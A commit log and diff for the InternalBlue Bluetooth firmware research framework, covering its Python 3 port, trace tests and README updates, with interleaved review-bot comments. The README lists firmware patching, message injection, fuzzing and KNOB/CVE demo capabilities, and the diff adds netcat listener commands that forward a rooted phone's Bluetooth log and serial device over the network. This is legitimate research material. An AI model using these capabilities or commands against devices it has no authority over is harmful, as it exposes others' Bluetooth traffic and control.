143 Commits

Author SHA1 Message Date
Florian Magin d3059b01d8 Fix subtle byte vs int issues (0 != '\x00' is True) 2020-02-27 11:18:21 +01:00
Florian Magin a7066170fc Declare startup trace on adbcore as flaky (works when run directly, doesn't work as part of suite) 2020-02-27 11:13:47 +01:00
Davide Toldo 748c713f67 Fix one of the traces in Python 3 2020-02-23 16:58:01 +01:00
Florian Magin 0864e96569 Propagate exceptions to test framework, ensure required pwnlibs version, ensure that traces don't abort early 2020-02-20 15:23:03 +01:00
Davide Toldo c6e39cb18f * Make pytest testcases Python 2 & 3 compatible
* Make InternalBlue start with ADBCore in Python 3
* Make InternalBlue start with HCICore in Python 3
* Substitute var.decode('hex') with bytearray.fromhex(var) in most places I found which works in Python 2 and 3 and performs the same task
* Substitute var.encode('hex') with new byte_to_hex function that works with Python 2 and 3 (in util.py)
* Declare variables explicitly as bytes instead of strings
* Fix small issue in macOS Core (explicit declaration of variable as byte)
2020-02-17 03:02:59 +01:00
Davide Toldo 07c5c4c336 * CLI now starts up (at least on mac) on Python 2 and 3
* Tests run, some throw errors.
2020-02-16 20:07:23 +01:00
Florian Magin 01589f8eee Hack around pwnlibs treating everything as bytes 2020-02-15 16:58:54 +01:00
Florian Magin d9de8f0d83 Some byte fixes in hcicore 2020-02-15 16:58:19 +01:00
Florian Magin 9b8d5b0740 Move requirements to setup.py 2020-02-15 16:51:43 +01:00
Florian Magin e53edb1ec9 Some byte fixes 2020-02-15 16:51:30 +01:00
Florian Magin b72e12b5a6 Fix subtle syntax change for python3 2020-02-15 16:39:59 +01:00
Florian Magin d7b3b8e7a1 First steps of automatic Python3 conversion
Commands in order:
- `futurize ./ -w -n`
- `git grep -l "queue\.Empty" | xargs sed -i 's/queue\.Empty/queue2k.Empty/'`
- `git grep -l "queue\.Queue" | xargs sed -i 's/queue\.Queue/queue2k.Queue/'`
- `git grep -l "import queue" | xargs sed -i 's/import queue/import queue as queue2k/'`

The search and replaces are needed because the local variables named
`queue` break the module that is called `queue` instead of `Queue` in
Python3

The testcases all still pass with python 2 but with python3 break
completely due to pwnlib issues
2020-02-15 15:52:12 +01:00
Florian Magin 2e49149639 Make ReplaySocket less verbose 2020-02-15 15:39:13 +01:00
Florian Magin 71b706139f Remove broken attempt at logging replacement 2020-02-15 14:48:23 +01:00
Florian Magin 2d713fcba6 Rename and skip broken trace tests 2020-02-15 14:35:57 +01:00
Florian Magin 79c94ab48b Move parsing logic to ConnectionInformation class 2020-02-15 14:28:37 +01:00
Florian Magin d691765c2b Linting related changes 2020-02-15 14:28:37 +01:00
Davide Toldo 004ee68fe5 Create object to pass around connection information instead of a dictionary 2020-02-15 14:28:37 +01:00
Davide Toldo fce72a2e8d Create object to pass around queue information instead of a dictionary
Signed-off-by: Davide Toldo <davide.toldo@stud.tu-darmstadt.de>
2020-02-15 14:28:37 +01:00
Davide Toldo b57d3d417f Add test for third dictionary (queue info) 2020-02-15 14:28:37 +01:00
Davide Toldo 4e9e82619a Add test for second dictionary, but new heap structure 2020-02-15 14:28:37 +01:00
Davide Toldo 657714acc6 Add test for second dictionary 2020-02-15 14:28:37 +01:00
Florian Magin 3b0478b0a5 First dict nosetest (#15)
* Add nose test for connection information retrieval

* forgot to add the required testcase

* Add new info connections trace where a device is actually connected

* Add nose test for connection information retrieval with real device connected

* Clean up structure
Add Galaxy S8 traces (new heap structure)
Delete unnecessary, failing macOS trace

* Add two more traces that cover the new memory layout branch in readHeapInformation

* Turn info_conn into proper tests

* Move the trace tests to a separate module

Co-authored-by: Davide Toldo <davidetoldo@posteo.de>
2020-02-15 14:28:37 +01:00
Florian Magin b386edbee1 Save all exceptions in the hooks into the core and add better error printing to the main thread (only works if some hook is active for now) 2020-02-15 14:28:37 +01:00
Florian Magin 6badef2279 Fix Hook Signatures to include the reference to the running core 2020-02-15 14:28:37 +01:00
Florian Magin f8e638e277 Allow main thread to detect when the send thread crashed with an AssertError and reraise it for full context and so testing frameworks can detect the failure 2020-02-15 14:28:37 +01:00
Florian Magin 1dfcc04a51 Remove the old method that manually searched the tests. Replaced with generate_test_suite to generate a UnittestSuite 2020-02-15 14:28:37 +01:00
Florian Magin 20a458d483 Rename the test function so it doesn't start with "test_" which confuses test frameworks and makes it clear that this function isn't a valid testcase by itself 2020-02-15 14:28:37 +01:00
Davide Toldo 8f63c5620e * Add ability to send ACL Data in macOS
* Clean up IOBluetoothExtended framework
2020-02-15 14:28:37 +01:00
Davide Toldo 1e88694f69 Add second patchrom trace for ADB Core for other branch 2020-02-15 14:28:37 +01:00
Davide Toldo 47640bdd58 Add patchrom trace for ADB Core 2020-02-15 14:28:37 +01:00
Florian Magin b10c6764b8 Allow test module to be tested with unittest by dynamically generating a test suite from trace files 2020-02-15 14:28:37 +01:00
Davide Toldo 9d4dab89f9 Add connection created / completed trace 2020-02-15 14:28:37 +01:00
Florian Magin 9e10339c9b More adbcore traces 2020-02-15 14:28:37 +01:00
Florian Magin e2fca88f2e Refactor replaying to centralise replay logic 2020-02-15 14:28:37 +01:00
Florian Magin 54470b7395 Mitigate race condition in replay 2020-02-15 14:28:37 +01:00
Davide Toldo d71e422884 Update gitignore 2020-02-15 14:28:37 +01:00
Davide Toldo c7ba318014 Add some traces 2020-02-15 14:28:37 +01:00
Davide Toldo 68d87b6e66 Hook ADBCore 2020-02-15 14:28:37 +01:00
Davide Toldo 4df59ca00c Make macos core less verbose (forgot to remove line) 2020-02-15 14:28:37 +01:00
Davide Toldo d9fd55bded Add 2 ADB traces 2020-02-15 14:27:35 +01:00
Florian Magin 532c36f8c9 Add wrappers to run trace tests via Python (to support IDE integration) 2020-02-15 14:27:35 +01:00
Florian Magin e339d34eca Allow CLI arguments to be passed in via an already parsed namespace instead 2020-02-15 14:27:35 +01:00
Florian Magin f1dadd9e79 Add command to hexdump trace 2020-02-15 14:27:35 +01:00
Florian Magin 225924ed5a Remove broken trace files 2020-02-15 14:27:35 +01:00
Florian Magin 96a9857229 Move traces to dedicate folders per core 2020-02-15 14:27:35 +01:00
Davide Toldo fc8258a072 Fix getsockname hook to work with macos framework 2020-02-15 14:27:35 +01:00
Davide Toldo 7f792d44cf Add pyobjc as optional dependency for macoscore 2020-02-15 14:27:35 +01:00
Florian Magin c0c3583361 Fix readafh.trace 2020-02-15 14:27:35 +01:00
Florian Magin bfa8902e56 Only close sockets once 2020-02-15 14:27:35 +01:00
Florian Magin 246fcd4e3e Fix MacOS replay and make it work on non MacOS platforms 2020-02-15 14:27:35 +01:00
Davide Toldo 21377ee4da Move init of IOBE to initializer of macOS core 2020-02-15 14:27:35 +01:00
Davide Toldo 9a33fda745 Add startup trace 2020-02-15 14:27:35 +01:00
Davide Toldo 4642ff4fa5 Add some traces 2020-02-15 14:27:35 +01:00
Florian Magin 1927b2ed15 Add generic trace test, example traces, and allow command to be specified in trace 2020-02-15 14:27:35 +01:00
Davide Toldo 7472ddf388 Make tracing work on macOS (sort of) 2020-02-15 14:27:35 +01:00
Florian Magin ac94f9295d Implement save and replay of traces 2020-02-15 14:27:35 +01:00
Florian Magin b81e4c861a Hci hooking (#13)
* Partial refactoring of hooking

* Fix logging in core.py and print exceptions in _sendThreadFunc in the log

* Refactor hci hooking
2020-02-15 14:27:35 +01:00
Florian Magin ca7a2071b1 Add recvfrom in SocketRecvHook 2020-02-15 14:27:35 +01:00
Florian Magin 3902a17680 Add lowest level HCI tracing functionality 2020-02-15 14:27:35 +01:00
Florian Magin 13c435b56e Fix minor None check 2020-02-15 14:27:35 +01:00
Florian Magin 63b4177a65 Allow specification of device via CLI arg 2020-02-15 14:27:35 +01:00
Florian Magin 4979dfd428 Add type annotation to device_list 2020-02-15 14:27:35 +01:00
Florian Magin 8a5f478ed3 Add required interface methods as NotImplemented 2020-02-15 14:27:35 +01:00
Florian Magin 2d97d0cb13 Add hci command test 2020-02-15 14:27:35 +01:00
Florian Magin a2e3929512 Add first testcases 2020-02-15 14:27:35 +01:00
Florian Magin e73299de42 Make args to internalblue_cli explicit so it can be called with custom args from python 2020-02-15 14:27:35 +01:00
Florian Magin b2c0ff6a62 Annotate testcore device_list 2020-02-15 14:27:35 +01:00
Florian Magin fdc47f52f8 Remove usage of logging wrapper for now 2020-02-15 14:27:35 +01:00
Florian Magin 5141aafaa9 Add --overwrite to memdump for testing 2020-02-15 14:27:35 +01:00
Florian Magin 8bc9b2c373 Add logging wrapper 2020-02-15 14:27:35 +01:00
Florian Magin c3d6c6dd6b Add init command argument for testing 2020-02-15 14:27:35 +01:00
Florian Magin 40909ed594 Annotations and import fixes 2020-02-15 14:27:35 +01:00
Florian Magin 29fd6420dd Minor fixes and annotations 2020-02-15 14:27:35 +01:00
Florian Magin 87a9496a19 Add type annotations for cmds 2020-02-15 14:27:35 +01:00
Florian Magin 62eda55e32 Type annotations for core.py and general type aliases 2020-02-15 14:27:35 +01:00
Davide Toldo eacd04811b Add write memory functionality to testcore 2020-02-15 14:27:35 +01:00
Davide Toldo 5959cd70f2 Fix bug 2020-02-15 14:27:35 +01:00
Davide Toldo ec3bddd71b Fix bug 2020-02-15 14:27:35 +01:00
Davide Toldo c8cda935a6 Some cleanup 2020-02-15 14:27:35 +01:00
Davide Toldo 854f57a3f9 Functional startup and memory reads 2020-02-15 14:27:35 +01:00
Jiska Classen e89a84812e updated readme 2020-02-06 00:55:20 +01:00
Jiska Classen dd9d76cff9 Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2020-02-03 23:38:32 +01:00
Jiska Classen 58f9688b84 updated firmware files 2020-02-03 23:38:00 +01:00
Davide Toldo 45ec18744e Make macos core less verbose (forgot to remove line) 2020-01-22 12:52:07 +01:00
Davide Toldo 45054b68c7 Use seemoo bundle identifier in macoscore 2019-12-22 15:36:16 +01:00
Davide Toldo 09149a2986 Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2019-12-22 14:49:09 +01:00
Davide Toldo dd19701c29 Use seemoo bundle identifier and 1 little change for disconnection complete 2019-12-22 14:48:49 +01:00
Jiska Classen a7ca8986d5 KNOB for Nexus 6P 2019-12-11 20:05:02 +01:00
Jiska Classen bf023043fb EWSN Paper: RXDN hook (BLE_Reception_PoC.py) 2019-12-11 13:58:58 +01:00
Davide Toldo 8045ff091e Merge branch 'master' of https://dev.seemoo.tu-darmstadt.de/bcm/internalblue 2019-11-16 19:02:51 +01:00
Davide Toldo b8a2ce4b88 Cleanup some dead code 2019-11-16 19:02:25 +01:00
Dennis Heinze 5096123ffe Make internalblue on iOS reliable by buffering and checking H4 data 2019-11-13 19:29:38 +01:00
Dennis Heinze db7f30e26d Remove buffering and make ios-proxy more reliable 2019-11-13 19:27:41 +01:00
Dennis Heinze ab5e8f2c91 Add more iPhone 7 FW details 2019-11-13 19:26:36 +01:00
Jiska Classen 4c13360fdd only import macos core if we are on macos (otherwise unneeded dependencies are included) 2019-10-23 17:12:12 +02:00
Davide Toldo 8eb34e7ba9 Remove unnecessary output from framework
Add instructions for Wireshark
2019-10-23 12:54:51 +02:00
Davide Toldo 9aae6af582 * Add source of macOS framework and build instructions
* Add automatic detection of macOS - no -m parameter needed anymore
2019-10-23 12:24:21 +02:00
Davide Toldo 2becb2c677 Improve Mac instructions 2019-10-21 12:31:49 +02:00
Davide Toldo baa828e54c macOS bugfixes:
* Fix bug that showed "connection complete" twice with a broken second response
* Fix bug that caused a crash if cancelling a connection request from the mac
2019-10-15 02:13:12 +02:00
Jiska Classen 4577f04292 minor fix for macos vs ios core, added iphone 6 patchram support 2019-10-15 00:43:47 +02:00
Davide Toldo 4390105641 Minor changes for macOS 2019-10-09 14:22:29 +02:00
Davide Toldo c6486bb4e2 Minor changes for macOS 2019-10-09 14:08:22 +02:00
Davide Toldo a1b3b88afc Add macOS support 2019-10-09 13:34:38 +02:00
Davide Toldo e049bbb622 Add fw file 2019-10-09 13:24:28 +02:00
Davide Toldo 982d403ec0 Fix connection complete for incoming requests and disconnection complete 2019-10-09 13:21:49 +02:00
Jiska Classen 383dfaf554 minor port number bugfix and fw addition 2019-10-09 13:21:29 +02:00
Davide Toldo af7df43f0b Improve Syntax 2019-10-03 18:19:14 +02:00
Davide Toldo 29f3817b0c Pass command length to IOBE; fixes non-working writeMem for example 2019-10-01 16:08:31 +02:00
Davide Toldo f63248480b * Add significantly faster IOBE Framework
* Use random ports instead of hardcoded ones
* Update macos requirements
2019-10-01 14:31:23 +02:00
Davide Toldo e66f506ac3 Switch to UDP 2019-10-01 01:13:22 +02:00
Jiska Classen 9d9b98ce71 new nexus5 knob poc with automatic callback 2019-09-28 03:05:57 +02:00
Davide Toldo f6fbe61d0f Optimize framework a bit and comment out a debug output in macOS core 2019-09-27 02:02:01 +02:00
Jiska Classen 6d3eb20e77 minor fixes in existing fw files, updated device database 2019-09-26 14:34:45 +02:00
Davide Toldo 5a64fefcaf Add firmware file for MBPr 2014 2019-09-24 16:06:21 +02:00
Davide Toldo 88734f1627 Update Framework 2019-09-24 16:05:54 +02:00
Davide Toldo ecbc710be2 Result from Bluetooth chip is now correctly returned via TCP socket. Simplified access from Python: Only create a single object with the in and output ports as parameters. 2019-09-20 20:53:34 +02:00
Jiska Classen 598a72dc50 updated hardware database, added rpi3 poc for knob 2019-09-19 09:59:11 +02:00
Davide Toldo 4b4a91db37 Use TCP Sockets to send commands to IOBluetoothExtended and to receive the result. Works perfectly, on its own thread etc., but currently returns a dummy response instead of a response from the Chip. 2019-09-19 03:10:17 +02:00
Jiska Classen 594bedfc7f updated readmes 2019-09-16 15:10:40 +02:00
Davide Toldo 4b6dba5252 Current status:
* Framework works
* Communication with Python works
* Both over UDP and via Objc NSNotificationCenter
* Current issue: Doesn't work on (background?) threads e.g. _sendThreadFunc
2019-09-05 01:29:29 +02:00
Davide Toldo 88f66a5fe1 Add macOS core to cli.py 2019-09-05 01:26:29 +02:00
Jiska Classen 9cd8c64104 KNOB PoCs for RPi 3+/4, Galaxy S8, CYW20735, Nexus 5 2019-09-04 22:47:38 +02:00
Jiska Classen 06ac829bce added new fw versions 2019-09-03 10:31:14 +02:00
Jiska Classen 575ed8e38a serial mode as switch that does not even try bluetooth.default.so 2019-09-02 21:46:48 +02:00
Jiska Classen cd9f65a51d support for iphone 8/x/xr 2019-08-30 14:48:13 +02:00
Jiska Classen 35dd491192 added new firmwares and some notes on the ios-proxy 2019-08-29 23:03:26 +02:00
Jiska Classen 2ec000cf69 iOS testing and bugfixing (iPhone SE, iOS 12.4) 2019-08-24 01:46:08 +02:00
Jiska Classen f8311834b2 breakpoints 2019-08-17 12:51:03 +02:00
Jiska Classen 16b33a366c automatic detection of bluetooth interface and logfile on android 2019-08-12 23:53:45 +02:00
Jiska Classen aa306d531e adapted READMEs to code 2019-08-07 17:37:29 +02:00
Jiska Classen 395e633577 coredumps for s10* 2019-08-07 17:00:19 +02:00
Jiska Classen 252b6e0ab8 added samsung s10/s10e/s10+ support for rooted stock rom 2019-08-06 18:20:35 +02:00
jiska 245be1873f firmware versions of Paul's devices 2019-07-31 11:12:18 +02:00
Jiska Classen 6f6720855f corrected and tested address for raspi 3+/4 2019-07-23 13:42:55 +02:00
Jiska Classen 7685005a2f sendlcp for raspi 3/3+/4 2019-07-23 13:36:10 +02:00
Jiska Classen 54d839e8e2 sendlcp command, did first tests with nexus 5 that seemed to work 2019-07-22 21:30:16 +02:00
Jiska Classen 2358acf26c bugfixes for handling patchram with different lengths/addresses 2019-07-18 14:16:16 +02:00
Jiska Classen 83cf9c63e0 tracepoints for cyw20719 2019-07-17 21:14:16 +02:00
Jiska Classen cea981c647 updated instructions for linux 2019-07-16 11:37:12 +02:00
Jiska Classen 636a4163e6 raspbian readme 2019-07-16 11:13:03 +02:00
Jiska 03d6f45aef rpi3 bd_addr 2019-07-10 15:40:09 +01:00
Jiska Classen 2bd937b4e2 rpi3 2019-07-10 15:41:03 +02:00
122 changed files with 12844 additions and 610 deletions
+8
@@ -17,3 +17,11 @@ btsnoop.log
# xcode
xcuserdata
*.xcworkspace
macos-framework/IOBluetoothExtended.framework/
# venv
venv
venv3
# pycharm
*.idea
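Review bot: the `*.idea` pattern at the end of this hunk is broader than the PyCharm project directory it is meant to cover, since it matches any file or directory whose name ends in `.idea` at any depth; the conventional entry is `.idea/`. The new `macos-framework/IOBluetoothExtended.framework/` entry is consistent with the framework being a build product, but the macOS README this commit range adds should say that the framework must be rebuilt locally rather than expected from the checkout.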
+136 -106
@@ -8,20 +8,143 @@ therefore implement monitoring and injection tools for the lower layers of
the Bluetooth protocol stack.
Publications and Background
---------------------------
* **Master Thesis** (07/2018)
*InternalBlue* was initially developed and documented in the
[Masterthesis](https://github.com/seemoo-lab/internalblue/raw/master/internalblue_thesis_dennis_mantz.pdf) by Dennis Mantz.
Afterwards the development was continued by SEEMOO. It was awarded with the [CAST Förderpreis](https://www.cysec.tu-darmstadt.de/cysec/start_news_details_136448.en.jsp).
* **MRMCD Talk** (09/2018)
The basic framework for Nexus 5 / BCM4339 was presented at the MRMCD Conference
2018 in Darmstadt. The talk was also [recorded](https://media.ccc.de/v/2018-154-internalblue-a-deep-dive-into-bluetooth-controller-firmware) and includes an overview of the framework as well as
two demo usages at the end (Following a **Secure Simple Pairing procedure in
Wireshark** and implementing a **proof of concept for CVE-2018-5383**).
* **35C3 Talk** (12/2018)
More extensions were [presented](https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth) at 35C3 2018 in Leipzig. New features include
creating connections to non-discoverable devices. Moreover, we gave a **demo of
CVE-2018-19860**, which can crash Bluetooth on several Broadcom chips. This talk
was also recorded and gives a more high level overview.
* **TROOPERS Talk** (03/2019)
* **WiSec Paper** (05/2019)
Our WiSec paper [Inside Job: Diagnosing Bluetooth Lower Layers Using Off-the-Shelf Devices](https://arxiv.org/abs/1905.00634) on reversing the
Broadcom Bluetooth diagnostics protocol was accepted, demonstrated and got the replicability label.
* **MobiSys Paper** (06/2019)
Our MobiSys paper [InternalBlue - Bluetooth Binary Patching and Experimentation Framework
](https://arxiv.org/abs/1905.00631) on the complete *InternalBlue* ecosystem got accepted.
* **REcon Talk** (06/2019)
We gave a talk at REcon, [Reversing and Exploiting Broadcom Bluetooth](https://cfp.recon.cx/reconmtl2019/talk/EQTRGU/).
It provides a first intuition on how to do binary patching in C with Nexmon to change Bluetooth functionality.
* **MRMCD Talk** (09/2019)
Our talk [Playing with Bluetooth](https://media.ccc.de/v/2019-185-playing-with-bluetooth) focuses on new device support
within *InternalBlue* and the Patchram state of various devices.
* **36C3 Talk** (12/2019)
The rather generic talk [All wireless communication stacks are equally broken](https://media.ccc.de/v/36c3-10531-all_wireless_communication_stacks_are_equally_broken)
points out a couple of new research directions and new Bluetooth projects coming up.
* **EWSN Paper & Demo** (02/2020)
We did some work on improving blacklisting performance of BLE data connections. Currently in a separate *blacklisting* branch.
Supported Features
------------------
This list is subject to change, but we give you a brief overview. You probably have a platform with a Broadcom chip that supports most features :)
On any Bluetooth chip:
* Send HCI commands
* Monitor HCI
* Establish connections
On any Broadcom Bluetooth chip:
* Read and write RAM
* Read and write assembly to RAM
* Read ROM
* Set defined breakpoints that crash on execution
* Inject arbitrary valid LMP messages (opcode and length must me standard compliant, contents and order are arbitrary)
* Use diagnostic features to monitor LMP and LCP (with new **Android** H4 driver patch, still needs to be integrated into BlueZ)
* Read AFH channel map
On selected Broadcom Bluetooth chips:
* Write to ROM via Patchram (any chip with defined firmware file >= build date 2012)
* Interpret core dumps (Nexus 5/6P, Samsung Galaxy S6, Evaluation Boards, Samsung Galaxy S10/S10e/S10+)
* Debug firmware with tracepoints (Nexus 5 and Evaluation Board CYW20735)
* Fuzz invalid LMP messages (Nexus 5 and Evaluation Board CYW20735)
* Inject LCP messages, including invalid messages (Nexus 5, Raspberry Pi 3/3+/4)
* Full object and function symbol table (Cypress Evaluation Boards only)
* Demos for Nexus 5 only:
* ECDH CVE-2018-5383 example
* NiNo example
* MAC address filter example
* KNOB attack test for various devices, including Raspberry Pi 3+/4
A comprehensive list of chips and which devices have them can be found in the [firmware](internalblue/fw/README.md) module documentation.
Requirements
------------
Android:
* Ideally recompiled `bluetooth.default.so`, but also works on any rooted smartphone, see [Android instructions](android_bluetooth_stack/README.md)
* Android device connected via ADB
* Best support is currently given for Nexus 5 / BCM4339 and Evaluation Boards
* Optional: Patch for Android driver to support Broadcom H4 forwarding
* Optional, if H4: Wireshark [Broadcom H4 Dissector Plugin](https://github.com/seemoo-lab/h4bcm_wireshark_dissector)
Linux:
* BlueZ, instructions see [here](linux_bluez/README.md)
* Best support for Raspberry Pi 3/3+/4
* For most commands: Privileged access
iOS:
* A jailbroken iOS device (tested on iOS 12.1.2/12.4 with iPhone 6, SE, 7, 8, X)
* The included `ios-proxy` (instructions in [here](ios-proxy/README.md))
* Optional: a Mac with `xcode` to compile the proxy yourself
* Optional, no jailbreak required: install [iOS Bluetooth Debug Profile](https://developer.apple.com/bug-reporting/profiles-and-logs/) to obtain
HCI and diagnostic messages, either via diagnostic report feature (all iOS versions) or live with PacketLogger (since iOS 13)
macOS:
* Homebrew
* Xcode 10.2.1
* Instructions see [here](macos-framework/README.md)
Setup and Installation
----------------------
The framework uses __ADB__ (Android Debug Bridge) to connect to an Android
smartphone, __BlueZ__ sockets on Linux, or the included __iOS Proxy__ on iOS.
For ADB, either connect the phone via USB or setup ADB over TCP and make sure you
For [Android](android_bluetooth_stack) with ADB, either connect the phone via USB or setup ADB over TCP and make sure you
enable USB debugging in the developer settings of Android.
The Android device needs to run a Bluetooth stack that was compiled with
debugging features enabled. A detailed description on how to compile the
Bluetooth stack for your device can be found in the *README.md* file inside the
*android_bluetooth_stack* directory of this repository. It also contains
precompiled stacks for some devices. InternalBlue does not work without the
debug Bluetooth stack.
If you have a jailbroken [iOS](ios-proxy) device, you need to install a proxy that locally connects
to the Bluetooth device and forwards HCI commands and events.
On [Linux](linux_bluez) with *BlueZ*, everything should work out of the box, but
you need to execute *InternalBlue* as root for most features.
The InternalBlue framework is written in Python 2. You can install it together
with all dependencies by using pip:
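Review bot: "opcode and length must me standard compliant" in the LMP injection bullet of the new Supported Features list should read "must be". The Setup section still ends with "The InternalBlue framework is written in Python 2" although the commits in this range ("Make pytest testcases Python 2 & 3 compatible", "Make InternalBlue start with ADBCore in Python 3") add Python 3 support, so this sentence should state which interpreters are supported. Minor: the Android requirement says "see [Android instructions]" while the iOS and macOS entries say "instructions in [here]" / "Instructions see [here]"; one phrasing would read better.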
@@ -60,6 +183,11 @@ All steps on a plain Ubuntu 18.04:
make
make install
Packets required on a current (July 2019) Raspian:
sudo apt-get --allow-releaseinfo-change update
sudo apt-get install git python-setuptools binutils-arm-none-eabi adb python-pip python-dev gcc libffi-dev
Usage
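Review bot: "Packets required on a current (July 2019) Raspian" should read "Packages required on a current (July 2019) Raspbian". The listed `python-setuptools`, `python-pip` and `python-dev` are the Python 2 packages, which matches the "written in Python 2" statement above but not the Python 3 conversion commits in this range; either add the `python3-` counterparts or say explicitly that this list targets the Python 2 installation.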
@@ -89,105 +217,7 @@ because the leading two bytes are not required by Bluetooth communication, you
can replace them with anything you want.
Requirements
------------
Android:
* Recompiled `bluetooth.default.so` built with `bdroid_CFLAGS='-DBT_NET_DEBUG=TRUE'`, see [build instructions](android_bluetooth_stack/README.md)
* Android device connected via ADB
* Best support is currently given for Nexus 5 / BCM4339
* Optional: Patch for Android driver to support Broadcom H4 forwarding
Linux:
* BlueZ
* Optional: Privileged access
iOS:
* A jailbroken iOS device
* The included ios-proxy (instructions in [here](ios-proxy/README.md))
* Optional: a Mac with xcode to compile the proxy yourself
Common Optional Requirements:
* Wireshark [Broadcom H4 Dissector Plugin](https://github.com/seemoo-lab/h4bcm_wireshark_dissector)
Supported Features
------------------
This list is subject to change, but we give you a brief overview. You probably have a platform with a Broadcom chip that supports most features :)
On any Bluetooth chip:
* Send HCI commands
* Monitor HCI
* Establish connections
On any Broadcom Bluetooth chip:
* Read and write RAM
* Read and write assembly to RAM
* Read ROM
* Inject arbitrary valid LMP messages (opcode and length must me standard compliant, contents and order are arbitrary)
* Use diagnostic features to monitor LMP and LCP (with new **Android** H4 driver patch, still needs to be integrated into BlueZ)
* Read AFH channel map
* Perform local RSSi sweep (coming soon!)
On selected Broadcom Bluetooth chips:
* BCM4335C0, BCM4358A3, CYW20735
* Write to ROM via Patchram
* Interpret coredumps
* BCM4335C0 only
* ECDH CVE-2018-5383 example
* NiNo example
* MAC address filter example
* Debug firmware with tracepoints
* BCM4335C0 and CYW20735
* Fuzz invalid LMP messages
* CYW20735 only
* Full object and function symbol table
A comprehensive list of chips and which devices have them can be found in the [firmware](internalblue/fw/README.md) module documentation.
Background
----------
* **Master Thesis** (07/2018)
InternalBlue was initially developed and documented in the
[Masterthesis](https://github.com/seemoo-lab/internalblue/raw/master/internalblue_thesis_dennis_mantz.pdf) by Dennis Mantz.
Afterwards the development was continued by SEEMOO. It was awarded with the [CAST Förderpreis](https://www.cysec.tu-darmstadt.de/cysec/start_news_details_136448.en.jsp).
* **MRMCD Talk** (09/2018)
The basic framework for Nexus 5 / BCM4339 was presented at the MRMCD Conference
2018 in Darmstadt. The talk was also [recorded](https://media.ccc.de/v/2018-154-internalblue-a-deep-dive-into-bluetooth-controller-firmware) and includes an overview of the framework as well as
two demo usages at the end (Following a **Secure Simple Pairing procedure in
Wireshark** and implementing a **proof of concept for CVE-2018-5383**).
* **35C3 Talk** (12/2018)
More extensions were [presented](https://media.ccc.de/v/35c3-9498-dissecting_broadcom_bluetooth) at 35C3 2018 in Leipzig. New features include
creating connections to non-discoverable devices. Moreover, we gave a **demo of
CVE-2018-19860**, which can crash Bluetooth on several Broadcom chips. This talk
was also recorded and gives a more high level overview.
* **TROOPERS Talk** (03/2019)
* **WiSec Paper** (05/2019)
Our WiSec paper [Inside Job: Diagnosing Bluetooth Lower Layers Using Off-the-Shelf Devices](https://arxiv.org/abs/1905.00634) on reversing the
Broadcom Bluetooth diagnostics protocol was accepted, demonstrated and got the replicability label.
* **MobiSys Paper** (06/2019)
Our MobiSys paper [InternalBlue - Bluetooth Binary Patching and Experimentation Framework
](https://arxiv.org/abs/1905.00631) on the complete *InternalBlue* ecosystem got accepted.
* **REcon Talk** (06/2019)
We gave a talk at REcon, [Reversing and Exploiting Broadcom Bluetooth](https://cfp.recon.cx/reconmtl2019/talk/EQTRGU/).
It gives a first intuition on how to do binary patching in C with Nexmon to change Bluetooth functionality.
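Review bot: the removed Supported Features block carried the chip-level grouping (BCM4335C0, BCM4358A3, CYW20735) and the "Perform local RSSi sweep (coming soon!)" bullet, neither of which reappears in the replacement list at the top of the file, which is organised by device name instead. If dropping them is intentional, the firmware module README linked from the new list becomes the only place the chip-to-feature mapping lives and should be checked for the same content; if the RSSI sweep is still planned, the bullet should be carried over.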
@@ -195,7 +225,7 @@ was also recorded and gives a more high level overview.
License
-------
Copyright 2018-2019 Dennis Mantz, Jiska Classen
Copyright 2018-2020 The InternalBlue Team
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
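Review bot: replacing "Copyright 2018-2019 Dennis Mantz, Jiska Classen" with "Copyright 2018-2020 The InternalBlue Team" removes the named copyright holders from a notice whose MIT-style text below requires the copyright notice to be retained; keep the original names, possibly alongside the team line, unless the authors have agreed to the change.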
+30 -1
@@ -2,7 +2,7 @@ Enable Debugging Features in the Android Bluetooth Stack
========================================================
The Android Bluetooth stack has [debugging features](https://chromium.googlesource.com/aosp/platform/system/bt/+/master/doc/network_ports.md)
which are disabled in normal builds. To enable them, the Bluetooth Stack
which are disabled in normal builds. To enable them, the Bluetooth stack
(*bluetooth.default.so*) has to be build with debugging preprocessor defines.
Another issue is that the Android Bluetooth stack does not support Broadcom
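Review bot: while changing "Stack" to "stack" here, the following unchanged line "(*bluetooth.default.so*) has to be build with debugging preprocessor defines" should also read "has to be built".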
@@ -17,11 +17,40 @@ been created according to the tutorial below. You can skip the build if you
happen to have a device for which a precompiled *bluetooth.default.so* exists.
NEW: Serial Forwarding
----------------------
With Android Oreo (8), significant parts of the network debug interface
were removed from the source code. Reintroducing these features would be ABI-breaking.
We introduced an experimental serial forwarding. If the connection to a
patched Bluetooth stack fails on Android, *InternalBlue* tries to setup sockets
with shell scripting. The only requirement is a rooted smartphone. This hack
even works on a recent __Samsung Galaxy S10e__ with __Android Pie (9)__ (Patchlevel June 2019).
In `adbcore.py`, we have a fallback that executes `_setupSerialSu`. This starts the
following processes:
tail -f -n +0 /data/log/bt/btsnoop_hci.log | nc -l -p 8872
nc -l -p 8873 >/sdcard/internalblue_input.bin
tail -f /sdcard/internalblue_input.bin >>/dev/ttySAC1
To run netcat, you need to install the `busybox` app. Depending on your Android version,
the paths for `*btsnoop_hci.log` and `/dev/tty*` might differ. Execute `lsof | grep bluetooth`
to get hints on the serial device used for Bluetooth.
Note that this solution is much slower than patching *bluetooth.default.so*.
The delay per command is quite long, but overall throughput is okay, i.e., stackdumps can
be received.
Prebuilt Library Status
-----------------------
Folder | Tag | HCI forwarding | H4 Broadcom Diagnostics | Notes
------ | --- | -------------- | ----------------------- | -----
none | Android 8+9 | yes | no | Serial and BT Snoop forwarding with `nc` (in `busybox` app), tested on rooted __Samsung Galaxy S10e__
android5_1_1 | android-5.1.1_r3 | rx only | no | Tested on Nexus 5 - HCI sniffing only!
android6_0_1 | android-6.0.1_r81 | yes | __yes__ | Recommended for __Nexus 5__ (android-6.0.1_r77), also works on Nexus 6P, seems like the version tag can differ a bit.
android7_1_2 | android-7.1.2_r28 | yes | __yes__ | Recommended for __Nexus 6P__, but it might run on Nexus 5X, Nexus Player, Pixel C.
